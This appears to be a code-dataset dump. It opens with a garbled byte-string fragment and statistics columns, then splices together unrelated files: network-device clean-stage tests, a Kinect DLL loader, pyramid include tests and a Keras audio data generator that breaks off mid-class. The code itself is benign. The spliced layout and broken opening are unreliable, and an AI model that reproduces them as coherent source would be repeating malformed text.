02\r\x01\x10\x00\x11\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x03\x05\x01\r\x02')) | 4,153 | 8,291 | 0.685047 | 1,692 | 8,306 | 3.318558 | 0.156028 | 0.24577 | 0.155476 | 0.108994 | 0.425468 | 0.349599 | 0.324844 | 0.27943 | 0.242743 | 0.223687 | 0 | 0.333421 | 0.081026 | 8,306 | 2 | 8,291 | 4,153 | 0.402201 | 0 | 0 | 0 | 0 | 1 | 0.554713 | 0.502588 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
d13d1fd2db572224cde9888ed0c3ba2f4dab4155 | 8,663 | py | Python | pkgs/clean-pkg/src/genie/libs/clean/stages/tests/test_backup_file_on_device.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 1 | 2022-01-16T10:00:24.000Z | 2022-01-16T10:00:24.000Z | pkgs/clean-pkg/src/genie/libs/clean/stages/tests/test_backup_file_on_device.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | pkgs/clean-pkg/src/genie/libs/clean/stages/tests/test_backup_file_on_device.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | import logging
import unittest
from unittest.mock import Mock
from genie.libs.clean.stages.stages import BackupFileOnDevice
from genie.libs.clean.stages.tests.utils import CommonStageTests, create_test_device
from pyats.aetest.steps import Steps
from pyats.results import Passed, Failed
from pyats.aetest.signals import TerminateStepSignal
# Disable logging. It may be useful to comment this out when developing tests.
logging.disable(logging.CRITICAL)


class VerifyEnoughAvailableDiskSpace(unittest.TestCase):

    def setUp(self):
        # Instantiate class object
        self.cls = BackupFileOnDevice()
        # Instantiate device object. This also sets up commonly needed
        # attributes and Mock objects associated with the device.
        self.device = create_test_device('PE1', os='iosxe')

    def test_pass(self):
        # Make sure we have a unique Steps() object for result verification
        steps = Steps()
        copy_dir = "bootflash:/"
        copy_file = "test.bin"
        data = {'dir bootflash:/': '''
            Directory of bootflash:/
            11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
            12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
            104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
            80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
            64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
            48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
            8033 drwx 4096 Nov 25 2016 18:42:07 -07:00 test.bin
            1940303872 bytes total (1036210176 bytes free)
            '''
        }
        # And we want the execute method to be mocked with device console output.
        self.device.execute = Mock(side_effect=lambda x: data[x])
        # Call the method to be tested (clean step inside class)
        self.cls.verify_enough_available_disk_space(
            steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
        )
        # Check that the result is expected
        self.assertEqual(Passed, steps.details[0].result)

    def test_fail_to_get_file_size(self):
        # Make sure we have a unique Steps() object for result verification
        steps = Steps()
        copy_dir = "bootflash:/"
        copy_file = "test.bin"
        data = {'dir bootflash:/': '''
            Directory of bootflash:/
            11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
            12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
            104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
            80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
            64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
            48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
            1940303872 bytes total (1036210176 bytes free)
            '''
        }
        # And we want the execute method to be mocked with device console output.
        self.device.execute = Mock(side_effect=lambda x: data[x])
        # We expect this step to fail so make sure it raises the signal
        with self.assertRaises(TerminateStepSignal):
            self.cls.verify_enough_available_disk_space(
                steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
            )
        # Check the overall result is as expected
        self.assertEqual(Failed, steps.details[0].result)

    def test_fail_to_get_available_disk_space(self):
        # Make sure we have a unique Steps() object for result verification
        steps = Steps()
        copy_dir = "bootflash:/"
        copy_file = "test.bin"
        data = {'dir bootflash:/': '''
            Directory of bootflash:/
            11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
            12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
            104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
            80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
            64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
            48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
            8033 drwx 4096 Nov 25 2016 18:42:07 -07:00 test.bin
            '''
        }
        # And we want the execute method to be mocked with device console output.
        self.device.execute = Mock(side_effect=lambda x: data[x])
        # We expect this step to fail so make sure it raises the signal
        with self.assertRaises(TerminateStepSignal):
            self.cls.verify_enough_available_disk_space(
                steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
            )
        # Check the overall result is as expected
        self.assertEqual(Failed, steps.details[0].result)

    def test_fail_low_available_disk_space(self):
        # Make sure we have a unique Steps() object for result verification
        steps = Steps()
        copy_dir = "bootflash:/"
        copy_file = "test.bin"
        data = {'dir bootflash:/': '''
            Directory of bootflash:/
            11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
            12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
            104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
            80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
            64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
            48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
            8033 drwx 8500 Nov 25 2016 18:42:07 -07:00 test.bin
            1940303872 bytes total (7000 bytes free)
            '''
        }
        # And we want the execute method to be mocked with device console output.
        self.device.execute = Mock(side_effect=lambda x: data[x])
        # We expect this step to fail so make sure it raises the signal
        with self.assertRaises(TerminateStepSignal):
            self.cls.verify_enough_available_disk_space(
                steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
            )
        # Check the overall result is as expected
        self.assertEqual(Failed, steps.details[0].result)


class CreateBackup(unittest.TestCase):

    def setUp(self):
        # Instantiate class object
        self.cls = BackupFileOnDevice()

        # Instantiate device object. This also sets up commonly needed
        # attributes and Mock objects associated with the device.
        self.device = create_test_device('PE1', os='iosxe')

    def test_pass(self):
        # Make sure we have a unique Steps() object for result verification
        steps = Steps()

        copy_dir = "bootflash:/"
        copy_file = "test.bin"

        # And we want the copy method to be mocked so that
        # it simulates the pass case.
        self.device.copy = Mock()

        # Call the method to be tested (clean step inside class)
        self.cls.create_backup(
            steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
        )

        # Check that the result is as expected
        self.assertEqual(Passed, steps.details[0].result)

    def test_fail_to_create_backup(self):
        # Make sure we have a unique Steps() object for result verification
        steps = Steps()

        copy_dir = "bootflash:/"
        copy_file = "test.bin"

        # And we want the copy method to be mocked to raise an exception,
        # so that it simulates the fail case.
        self.device.copy = Mock(side_effect=Exception)

        # We expect this step to fail so make sure it raises the signal
        with self.assertRaises(TerminateStepSignal):
            self.cls.create_backup(
                steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
            )

        # Check the overall result is as expected
        self.assertEqual(Failed, steps.details[0].result)
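The `Mock(side_effect=...)` pattern used throughout these tests can be reduced to a standalone sketch; the `responses` mapping and command strings below are illustrative stand-ins, not values from the suite:

```python
from unittest.mock import Mock

# Map each CLI command to the canned console output it should return.
responses = {'dir bootflash:/': 'Directory of bootflash:/ ...'}

# side_effect with a lambda turns the mock into a lookup table: known
# commands return their canned output, unknown ones raise KeyError.
execute = Mock(side_effect=lambda cmd: responses[cmd])

print(execute('dir bootflash:/'))
```

Because `side_effect` is called with the mock's arguments, the same mock also records calls (`execute.call_count`, `execute.call_args_list`) for later verification.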

# File: infer_tools/legacy/Kinect.py (repo: TaehaKim-Kor/EVCIDNet, license: Apache-2.0)

import ctypes
import cv2
import os
lib_cv = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/opencv/build/x64/vc15/bin/opencv_world453.dll')
libd_cv = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/opencv/build/x64/vc15/bin/opencv_world453d.dll')
lib_k4a = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/Microsoft.Azure.Kinect.Sensor.1.4.1/lib/native/amd64/release/k4a.dll')
lib_de = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/Microsoft.Azure.Kinect.Sensor.1.4.1/lib/native/amd64/release/depthengine_2_0.dll')
lib_k4arec = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/packages/Microsoft.Azure.Kinect.Sensor.1.4.1/lib/native/amd64/release/k4arecord.dll')
kinect_lib = ctypes.CDLL('C:/Users/anstn/Desktop/KINECT_DLL/Kinect_DLL/x64/Debug/Kinect_DLL.dll')
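As an aside, hard-coded absolute paths like the above break on any other machine. A more portable load (sketched here with the standard C math library, since the Kinect DLLs are machine-specific) resolves the library through `ctypes.util.find_library` and declares call signatures explicitly:

```python
import ctypes
import ctypes.util

# Resolve the shared library through the system search path instead of
# a hard-coded absolute path; returns None if the library is not found.
libm_path = ctypes.util.find_library('m')

if libm_path is not None:
    libm = ctypes.CDLL(libm_path)
    # Declare the C signature before calling: double sqrt(double)
    libm.sqrt.restype = ctypes.c_double
    libm.sqrt.argtypes = [ctypes.c_double]
    result = libm.sqrt(9.0)
else:
    result = None  # library unavailable on this platform
```

Declaring `restype`/`argtypes` up front avoids the silent int-truncation bugs that come from ctypes' default `int` return type.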

# File: bpd/models/__init__.py (repo: cassidylaidlaw/boltzmann-policy-distribution, license: MIT)

from . import pickup_ring_models  # noqa: F401
try:
    from . import overcooked_models  # noqa: F401
except ImportError:
    pass  # Might fail if Overcooked isn't installed.
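The guarded import above is the usual optional-dependency pattern. A self-contained sketch (the module name is hypothetical, chosen so the import fails):

```python
# Try to import an optional dependency; fall back to None if absent.
try:
    import some_hypothetical_optional_dep as optional_dep  # hypothetical name
except ImportError:
    optional_dep = None


def optional_feature_available():
    """Report whether the optional feature can be used."""
    return optional_dep is not None
```

Keeping the sentinel (`optional_dep = None`) lets the rest of the package branch on availability instead of re-attempting the import.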

# File: tests/test_includer.py (repo: djedproject/djed_static, license: 0BSD)

from pyramid.response import Response
from djed.testing import BaseTestCase


class TestIncluder(BaseTestCase):

    _includes = ('djed.static',)

    def test_components(self):

        def view(request):
            request.include('jquery')
            return Response('<html><head></head><body></body></html>')

        self.config.add_route('view', '/')
        self.config.add_view(view, route_name='view')
        self.config.add_bower_components('tests:static/dir1')

        app = self.make_app()
        response = app.get('/')
        self.assertEqual(response.body, (
            b'<html><head>'
            b'<script type="text/javascript" '
            b'src="/bowerstatic/components/jquery/1.0.0/jquery.js">'
            b'</script></head><body></body></html>'))

        response = app.get('/bowerstatic/components/jquery/1.0.0/jquery.js')
        self.assertEqual(response.body, b'/* dir1/jquery.js */\n')

    def test_components_in_template(self):

        def view(request):
            return {}

        self.config.include('pyramid_chameleon')
        self.config.add_route('view', '/')
        self.config.add_view(
            view, route_name='view', renderer='tests:templates/index.pt')
        self.config.add_bower_components('tests:static/dir1')

        app = self.make_app()
        response = app.get('/')
        self.assertIn(
            b'<script type="text/javascript" '
            b'src="/bowerstatic/components/jquery/1.0.0/jquery.js">'
            b'</script>', response.body)

        response = app.get('/bowerstatic/components/jquery/1.0.0/jquery.js')
        self.assertEqual(response.body, b'/* dir1/jquery.js */\n')

    def test_components_not_exist_errors(self):
        from pyramid.exceptions import ConfigurationError

        self.assertRaises(ConfigurationError, self.request.include, 'jquery')
        self.assertRaises(ConfigurationError, self.request.include,
                          'not-exist')

    def test_local_component(self):

        def view(request):
            request.include('myapp')
            return Response('<html><head></head><body></body></html>')

        self.config.add_route('view', '/')
        self.config.add_view(view, route_name='view')
        self.config.add_bower_components('tests:static/dir1')
        self.config.add_bower_component('tests:static/local/myapp')

        app = self.make_app()
        response = app.get('/')
        self.assertEqual(response.body, (
            b'<html><head>'
            b'<script type="text/javascript" src='
            b'"/bowerstatic/components/jquery/1.0.0/jquery.js">'
            b'</script>\n<script type="text/javascript" '
            b'src="/bowerstatic/components/myapp/1.0.0/myapp.js"></script>'
            b'</head><body></body></html>'))

        response = app.get('/bowerstatic/components/myapp/1.0.0/myapp.js')
        self.assertEqual(response.body, b'/* myapp.js */\n')

    def test_local_component_in_template(self):

        def view(request):
            return {}

        self.config.include('pyramid_chameleon')
        self.config.add_route('view', '/')
        self.config.add_view(
            view, route_name='view', renderer='tests:templates/index_local.pt')
        self.config.add_bower_components('tests:static/dir1')
        self.config.add_bower_component('tests:static/local/myapp')

        app = self.make_app()
        response = app.get('/')
        self.assertIn((
            b'<script type="text/javascript" src='
            b'"/bowerstatic/components/jquery/1.0.0/jquery.js">'
            b'</script>\n<script type="text/javascript" '
            b'src="/bowerstatic/components/myapp/1.0.0/myapp.js"></script>'),
            response.body)

        response = app.get('/bowerstatic/components/jquery/1.0.0/jquery.js')
        self.assertEqual(response.body, b'/* dir1/jquery.js */\n')

        response = app.get('/bowerstatic/components/myapp/1.0.0/myapp.js')
        self.assertEqual(response.body, b'/* myapp.js */\n')

    def test_custom_components(self):

        def view(request):
            request.include('jquery', 'lib')
            return Response('<html><head></head><body></body></html>')

        self.config.add_route('view', '/')
        self.config.add_view(view, route_name='view')
        self.config.add_bower_components('tests:static/dir1', name='lib')

        app = self.make_app()
        response = app.get('/')
        self.assertEqual(response.body, (
            b'<html><head>'
            b'<script type="text/javascript" '
            b'src="/bowerstatic/lib/jquery/1.0.0/jquery.js">'
            b'</script>'
            b'</head><body></body></html>'))

        response = app.get('/bowerstatic/lib/jquery/1.0.0/jquery.js')
        self.assertEqual(response.body, b'/* dir1/jquery.js */\n')

    def test_custom_local_component(self):

        def view(request):
            request.include('myapp', 'lib')
            return Response('<html><head></head><body></body></html>')

        self.config.add_route('view', '/')
        self.config.add_view(view, route_name='view')
        self.config.add_bower_components('tests:static/dir1', name='lib')
        self.config.add_bower_component('tests:static/local/myapp', 'lib')

        app = self.make_app()
        response = app.get('/')
        self.assertEqual(response.body, (
            b'<html><head>'
            b'<script type="text/javascript" src='
            b'"/bowerstatic/lib/jquery/1.0.0/jquery.js">'
            b'</script>\n<script type="text/javascript" '
            b'src="/bowerstatic/lib/myapp/1.0.0/myapp.js"></script>'
            b'</head><body></body></html>'))

        response = app.get('/bowerstatic/lib/myapp/1.0.0/myapp.js')
        self.assertEqual(response.body, b'/* myapp.js */\n')

# File: tests/_base3.py (repo: garywu/pipedream, license: BSD-3-Clause)

import unittest_rand_gen_state


class RandStateSaverBase(metaclass=unittest_rand_gen_state.Saver):
    pass
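The `metaclass=` argument hands class creation over to `unittest_rand_gen_state.Saver`. Since `Saver`'s actual behavior is not shown here, a minimal hypothetical metaclass illustrates the mechanism:

```python
class Saver(type):
    """Hypothetical stand-in: tags every class it creates."""

    def __new__(mcs, name, bases, namespace):
        # Runs once, at class-definition time, before the class object exists.
        namespace['saved_state'] = True
        return super().__new__(mcs, name, bases, namespace)


class RandStateBase(metaclass=Saver):
    pass
```

The injected attribute exists as soon as the `class` statement finishes, which is why a metaclass is the right hook for registering or snapshotting state per test-case class.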

# File: data.py (repo: Aralas/icassp19, license: MIT)
import numpy as np
import os
import utils
from sklearn.preprocessing import StandardScaler
from keras.utils import Sequence, to_categorical
# NOTE:
# these data generators work for small-medium size datasets under no memory constraints, eg RAM 32GB or more.
# If used with smaller RAMs, a slightly different approach for feeding the net may be needed.
def get_label_files(filelist=None, dire=None, suffix_in=None, suffix_out=None):
    """
    Load the label for every feature file in filelist.

    :param filelist: list of feature file names
    :param dire: directory containing the feature and label files
    :param suffix_in: suffix of the feature files, e.g. '_mel'
    :param suffix_out: suffix of the label files, e.g. '_label'
    :return: column vector of labels, one row per file
    """
    nb_files_total = len(filelist)
    labels = np.zeros((nb_files_total, 1), dtype=np.float32)
    for f_id in range(nb_files_total):
        labels[f_id] = utils.load_tensor(in_path=os.path.join(dire, filelist[f_id].replace(suffix_in, suffix_out)))
    return labels


class DataGeneratorPatch(Sequence):
    """
    Reads data from disk and returns batches.
    """

    def __init__(self, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
                 suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):

        self.data_dir = feature_dir
        self.list_fnames = file_list
        self.batch_size = params_learn.get('batch_size')
        self.floatx = floatx
        self.suffix_in = suffix_in
        self.suffix_out = suffix_out
        self.patch_len = int(params_extract.get('patch_len'))
        self.patch_hop = int(params_extract.get('patch_hop'))

        # Given a directory with precomputed features in files:
        # - create the variable self.features with all the TF patches of all the files in the feature_dir
        # - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
        if feature_dir is not None:
            self.get_patches_features_labels(feature_dir, file_list)

        # standardize the data
        self.features2d = self.features.reshape(-1, self.features.shape[2])

        # if train set, create scaler, fit, transform, and save the scaler
        if scaler is None:
            self.scaler = StandardScaler()
            self.features2d = self.scaler.fit_transform(self.features2d)
            # this scaler will be used later on to scale val and test data
        else:
            # if we are in val or test set, load the training scaler as a param and transform
            self.features2d = scaler.transform(self.features2d)

        # after scaling in 2D, go back to tensor
        self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)

        # but all the patches are contiguously ordered: shuffle them before making batches
        self.on_epoch_end()
        self.n_classes = params_learn.get('n_classes')

    def get_num_instances_per_file(self, f_name):
        """
        Return the number of context_windows, patches, or instances generated out of a given file
        """
        shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
        file_frames = float(shape[0])
        return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))

    def get_feature_size_per_file(self, f_name):
        """
        Return the dimensionality of the features in a given file.
        Typically, this will be the number of bins in a T-F representation
        """
        shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
        return shape[1]

    def get_patches_features_labels(self, feature_dir, file_list):
        """
        Given a directory with precomputed features in files:
        - create the variable self.features with all the TF patches of all the files in the feature_dir
        - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
        - shuffle them
        """
        assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
        print('Loading self.features...')

        # list of file names containing features
        self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
                          os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
        self.nb_files = len(self.file_list)
        assert self.nb_files > 0, "there are no features files in the feature directory"
        self.feature_dir = feature_dir

        # For all set, cumulative sum of instances (or T_F patches) per file
        self.nb_inst_cum = np.cumsum(np.array(
            [0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
                   for f_name in self.file_list], dtype=int))
        self.nb_inst_total = self.nb_inst_cum[-1]

        # how many batches can we fit in the set
        self.nb_iterations = int(np.floor(self.nb_inst_total / self.batch_size))

        # feature size (last dimension of the output)
        self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))

        # init the variables with features and labels
        self.features = np.zeros((self.nb_inst_total, self.patch_len, self.feature_size), dtype=self.floatx)
        self.labels = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)

        # fetch all data from hard-disk
        for f_id in range(self.nb_files):
            # for every file on disk, perform slicing into T-F patches, and store them in tensor self.features
            self.fetch_file_2_tensor(f_id)

    def fetch_file_2_tensor(self, f_id):
        """
        For the file specified by f_id, perform slicing into T-F patches,
        and store them in tensor self.features

        :param f_id: index of the file within self.file_list
        """
        mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
        label = utils.load_tensor(in_path=os.path.join(self.feature_dir,
                                                       self.file_list[f_id].replace(self.suffix_in, self.suffix_out)))

        # indexes to store patches in self.features, according to the nb of instances from the file
        idx_start = self.nb_inst_cum[f_id]      # start for a given file
        idx_end = self.nb_inst_cum[f_id + 1]    # end for a given file

        # slicing + storing in self.features
        # copy each TF patch of size (context_window_frames, feature_size) in self.features
        idx = 0     # to index the different patches of f_id within self.features
        start = 0   # starting frame within f_id for each T-F patch
        while idx < (idx_end - idx_start):
            self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
            # update indexes
            start += self.patch_hop
            idx += 1
        self.labels[idx_start: idx_end] = label[0]

    def __len__(self):
        return self.nb_iterations

    def __getitem__(self, index):
        """
        Takes an index (batch number) and returns one batch of self.batch_size patches.

        :param index: batch number
        :return: (features, one-hot labels) for the batch
        """
        # index is taken care of by the inherited Sequence
        indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]

        # fetch labels for the batch
        y_int = np.empty((self.batch_size, 1), dtype='int')
        for tt in np.arange(self.batch_size):
            y_int[tt] = int(self.labels[indexes[tt]])
        y_cat = to_categorical(y_int, num_classes=self.n_classes)

        # fetch features for the batch and adjust format to input CNN
        # (batch_size, 1, time, freq) for channels_first
        features = self.features[indexes, np.newaxis]
        return features, y_cat

    def on_epoch_end(self):
        # shuffle data between epochs
        self.indexes = np.random.permutation(self.nb_inst_total)
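The sliding-window count in `get_num_instances_per_file` can be checked in isolation; this sketch just restates the formula with concrete numbers:

```python
import numpy as np


def num_patches(file_frames, patch_len, patch_hop):
    # At least one patch per file, even for clips shorter than patch_len.
    return int(np.maximum(1, int(np.ceil((file_frames - patch_len) / patch_hop))))


# 100 frames with 25-frame patches hopping by 25 -> 3 full hops fit
print(num_patches(100, 25, 25))   # 3
# A clip shorter than one patch still yields a single patch
print(num_patches(10, 25, 25))    # 1
```

Note the hop enters the denominator, so halving `patch_hop` roughly doubles the number of training instances extracted per clip.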


class PatchGeneratorPerFile(object):
    """
    Reads whole T-F representations from disk,
    and stores the T-F patches *for a given entire file* in a tensor,
    typically for prediction on a test set
    """

    def __init__(self, feature_dir=None, file_list=None, params_extract=None,
                 suffix_in='_mel', floatx=np.float32, scaler=None):

        self.data_dir = feature_dir
        self.floatx = floatx
        self.suffix_in = suffix_in
        self.patch_len = int(params_extract.get('patch_len'))
        self.patch_hop = int(params_extract.get('patch_hop'))

        # Given a directory with precomputed features in files:
        # - create the variable self.features with all the TF patches of all the files in the feature_dir
        if feature_dir is not None:
            self.get_patches_features(feature_dir, file_list)

        # standardize the data: assuming this is used for inference
        self.features2d = self.features.reshape(-1, self.features.shape[2])
        # since we are in the val or test subset, load the training scaler as a param and transform
        self.features2d = scaler.transform(self.features2d)

        # go back to 3D tensor
        self.features = self.features2d.reshape(self.nb_patch_total, self.patch_len, self.feature_size)

    def get_num_instances_per_file(self, f_name):
        """
        Return the number of context_windows or instances generated out of a given file
        """
        shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
        file_frames = float(shape[0])
        return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))

    def get_feature_size_per_file(self, f_name):
        """
        Return the dimensionality of the features in a given file.
        Typically, this will be the number of bins in a T-F representation
        """
        shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
        return shape[1]

    def get_patches_features(self, feature_dir, file_list):
        """
        Given a directory with precomputed features in files:
        - create the variable self.features with all the TF patches of all the files in the feature_dir
        """
        assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"

        # list of file names containing features
        self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data')]
        self.nb_files = len(self.file_list)
        assert self.nb_files > 0, "there are no features files in the feature directory"
        self.feature_dir = feature_dir

        # For all set, cumulative sum of instances per file
        self.nb_inst_cum = np.cumsum(np.array(
            [0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
                   for f_name in self.file_list], dtype=int))
        self.nb_patch_total = self.nb_inst_cum[-1]

        # init current file, to keep track of the file yielded for prediction
        self.current_f_idx = 0

        # feature size (last dimension of the output)
        self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))

        # init the variable with features
        self.features = np.zeros((self.nb_patch_total, self.patch_len, self.feature_size), dtype=self.floatx)

        # fetch all data from hard-disk
        for f_id in range(self.nb_files):
            # for every file on disk, perform slicing into T-F patches, and store them in tensor self.features
            self.fetch_file_2_tensor(f_id)

    def fetch_file_2_tensor(self, f_id):
        """
        For the file specified by f_id, perform slicing into T-F patches,
        and store them in tensor self.features

        :param f_id: index of the file within self.file_list
        """
        mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))

        # indexes to store patches in self.features, according to the nb of instances from the file
        idx_start = self.nb_inst_cum[f_id]      # start for a given file
        idx_end = self.nb_inst_cum[f_id + 1]    # end for a given file

        # slicing + storing in self.features
        # copy each TF patch of size (context_window_frames, feature_size) in self.features
        idx = 0     # to index the different patches of f_id within self.features
        start = 0   # starting frame within f_id for each T-F patch
        while idx < (idx_end - idx_start):
            self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
            # update indexes
            start += self.patch_hop
            idx += 1

    def get_patches_file(self):
        """
        Returns all the patches for one single audio clip
        """
        self.current_f_idx += 1
        # ranges from 1 to self.nb_files (ignores 0)
        assert self.current_f_idx <= self.nb_files, 'All the test files have been dispatched'

        # fetch features in the batch and adjust format to input CNN
        # (nb_patches_per_file, 1, time, freq)
        features = self.features[self.nb_inst_cum[self.current_f_idx - 1]: self.nb_inst_cum[self.current_f_idx], np.newaxis]
        return features
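The slicing loop in `fetch_file_2_tensor` can be reproduced on a toy spectrogram (shapes chosen arbitrarily for illustration) to see how `patch_len` and `patch_hop` interact:

```python
import numpy as np

mel_spec = np.arange(12, dtype=np.float32).reshape(6, 2)  # 6 frames, 2 freq bins
patch_len, patch_hop = 3, 2
n_patches = max(1, int(np.ceil((6 - patch_len) / patch_hop)))  # 2

patches = np.zeros((n_patches, patch_len, 2), dtype=np.float32)
start = 0
for idx in range(n_patches):
    # Consecutive patches overlap by patch_len - patch_hop frames.
    patches[idx] = mel_spec[start: start + patch_len]
    start += patch_hop
```

With `patch_hop < patch_len` the windows overlap, so the last frames of one patch reappear at the start of the next.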


class DataGeneratorPatchOrigin(Sequence):
    """
    Reads data from disk and returns batches.
    Allows creating one-hot encoded vectors carrying flags, i.e. 100 instead of 1.
    This is used in the loss functions to distinguish patches coming from the noisy or the clean set.
    """

    def __init__(self, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
                 suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):

        self.data_dir = feature_dir
        self.list_fnames = file_list
        self.batch_size = params_learn.get('batch_size')
        self.floatx = floatx
        self.suffix_in = suffix_in
        self.suffix_out = suffix_out
        self.patch_len = int(params_extract.get('patch_len'))
        self.patch_hop = int(params_extract.get('patch_hop'))
        self.noisy_ids = params_learn.get('noisy_ids')

        # Given a directory with precomputed features in files:
        # - create the variable self.features with all the TF patches of all the files in the feature_dir
        # - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
        if feature_dir is not None:
            self.get_patches_features_labels(feature_dir, file_list)

        # standardize the data
        self.features2d = self.features.reshape(-1, self.features.shape[2])

        # if train set, create scaler, fit, transform, and save the scaler
        if scaler is None:
            self.scaler = StandardScaler()
            self.features2d = self.scaler.fit_transform(self.features2d)
            # this scaler will be used later on to scale val and test data
        else:
            # if we are in val or test set, load the training scaler as a param and transform
            self.features2d = scaler.transform(self.features2d)

        # after scaling in 2D, go back to tensor
        self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)

        self.on_epoch_end()
        self.n_classes = params_learn.get('n_classes')

    def get_num_instances_per_file(self, f_name):
        """
        Return the number of context_windows, patches, or instances generated out of a given file
        """
        shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
        file_frames = float(shape[0])
        return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))

    def get_feature_size_per_file(self, f_name):
        """
        Return the dimensionality of the features in a given file.
        Typically, this will be the number of bins in a T-F representation
        """
        shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
        return shape[1]

    def get_patches_features_labels(self, feature_dir, file_list):
        """
        Given a directory with precomputed features in files:
        - create the variable self.features with all the TF patches of all the files in the feature_dir
        - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
        - shuffle them
        """
        assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
        print('Loading self.features...')

        # list of file names containing features
        self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
                          os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
        self.nb_files = len(self.file_list)
        assert self.nb_files > 0, "there are no features files in the feature directory"
        self.feature_dir = feature_dir

        # For all set, cumulative sum of instances (or T_F patches) per file
        self.nb_inst_cum = np.cumsum(np.array(
            [0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
                   for f_name in self.file_list], dtype=int))
        self.nb_inst_total = self.nb_inst_cum[-1]

        # how many batches can we fit in the set
        self.nb_iterations = int(np.floor(self.nb_inst_total / self.batch_size))

